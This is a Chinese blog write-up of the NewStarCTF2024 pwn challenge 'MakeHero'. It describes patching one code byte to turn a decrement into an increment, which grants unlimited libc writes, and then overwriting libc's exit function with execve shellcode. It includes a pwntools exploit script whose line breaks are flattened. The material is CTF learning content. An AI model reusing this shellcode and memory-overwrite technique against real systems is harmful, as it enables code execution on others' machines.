当前位置: 首页 > news >正文

NewStarCTF2024 Week4 Pwn MakeHero

主要是exp的写法

先checksec一下:

image

啥都开了

然后pwndbg里面运行一下,发现给了两个地址范围,动调一下发现第一个范围是代码段的内存地址,第二个范围是libc加载的内存地址(我本地左端点是libc_base+0x28000)

拖到ida里面整理一下:

image

相当于是给了两次机会,第一次机会可以修改一个代码段里面的一个字节,第二次机会可以修改加载到内存中的libc一个字节

仅凭这两次操作我们没办法直接getshell,我们考虑能不能创造出更多修改的机会,注意到终止条件的写法:

image

每次chance--,当chance为0时终止,如果我们第一次修改代码段,将--改为++,后面chance会恒大于1,那么我们就可以不限次数地任意修改libc段了

具体地,我们将8D 50 FF改为8D 50 01即可

然后我们考虑把exit函数的内容覆写为shellcode,因为最后退出的时候一定会调用exit函数:

屏幕截图 2025-11-24 201206

在ida中可以看exit函数的偏移和内容:

屏幕截图 2025-11-24 201304

我们从exit起始地址+4的位置开始覆写就好。

下面是exp的实现

from pwn import *
p = process('./pwn')
libc = ELF('./libc.so.6')
def write_mem(addr,data):val = dataif isinstance(data,bytes):val = u8(data)p.sendlineafter(b'\x89\xef\xbc\x81',hex(addr)+' '+hex(val))
def write_code(addr,data):for i in range(len(data)):write_mem(addr+i,data[i])
def Exploit():p.recvuntil(b'** ')code_base = int(p.recvuntil(b' -',drop=1),16)p.recvuntil(b'## ')libc_base = int(p.recvuntil(b' -',drop=1),16)p.sendline(b'Regules')write_mem(code_base+0x1877,0x1)print(hex(libc_base))shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"write_code(libc_base-0x28000+libc.sym.exit+4,shellcode)print(hex(libc_base+libc.sym.exit+4))gdb.attach(p)p.interactive()p.recvuntil(b'\x89\xef\xbc\x81')p.sendline(b'bye!')p.interactive()
if __name__ == '__main__':Exploit()

上面是过本地的exp,远程没过。

对比一下发现是libc_base的区别,远程的libc_base就是程序给的那个左端点,问了问deepseek,推测大概率是ld文件版本和远程不太一样导致的,我选.ld文件版本要比.so文件的版本稍微高一点,这可能造成了加载libc到内存中的差异。所以以后ld文件最好还是找完全一样的版本比较好。

因为上面这个问题卡了挺久,实际上如果你远程手玩一遍,本地手玩一遍,很容易发现两者存在差异,所以以后遇到涉及获取内存信息的题目,本地和远程都拿出来看看对比对比,是比较稳妥的。

http://www.gsyq.cn/news/59501.html

相关文章:

  • 「张张讲AI」AI资讯公众号:联动深圳人才集团,讲师输出资讯+授课,助力AI落地
  • 2025年11月GEO优化公司推荐评测报告:从稳定性到AI能力的解决方案剖析
  • WPF的四种曲线绘制
  • 别让你的SQL跑了一整晚,最后只产出一堆数字垃圾
  • Windwos11终端的作用
  • 2025空调噪声治理厂家精选
  • 2025.11.24模拟赛
  • 热流道厂家品牌有哪些?2025热流道技术哪家强?
  • 2025安全生产目视化管理公司有哪些:优质目视化管理机构推荐
  • 2025热流道厂家选哪家好?热流道厂家排名实力榜单
  • 2025外贸独立站哪家公司好?泉州独立站外贸建站公司推荐
  • 2025铸铁研磨盘哪家强:球墨铸铁研磨盘生产厂家测评
  • 2025移动水肥一体机定做:莱芜水肥一体机厂家有哪些盘点
  • 2025中山财税公司大盘点-中山代办注册公司哪家好
  • 2025门窗隔热条厂家推荐测评
  • 2025智慧农业物联网解决方案厂商的水肥一体机十大排名公布
  • 数学的大厦(六):有理数、无理数、实数
  • 2025福建谷歌优化公司推荐/福建独立站建站公司推荐
  • 2025气动接头生产厂家推荐,优质气动接头厂家精选
  • 2025替代进口的气动接头厂家精选分析
  • 2025电动车连接器厂家优选,靠谱锂电池连接器厂家推荐测评
  • 2025优质水性喷胶厂家推荐盘点
  • 2025推荐控制变压器厂家实力解析
  • 2025稳压器厂家哪家好?优质厂家实力测评
  • Cursor 的提示词
  • 今日Reddit AI高价值讨论分析 10.25 - 实践
  • AI序章
  • 2025-11-24 NOIP 模拟赛8 赛后总结
  • 深入解析:STM32H743-ARM例程31-CAN
  • 2025年11月江苏徐州隔热条工厂综合推荐指南:五大优质供应商深度解析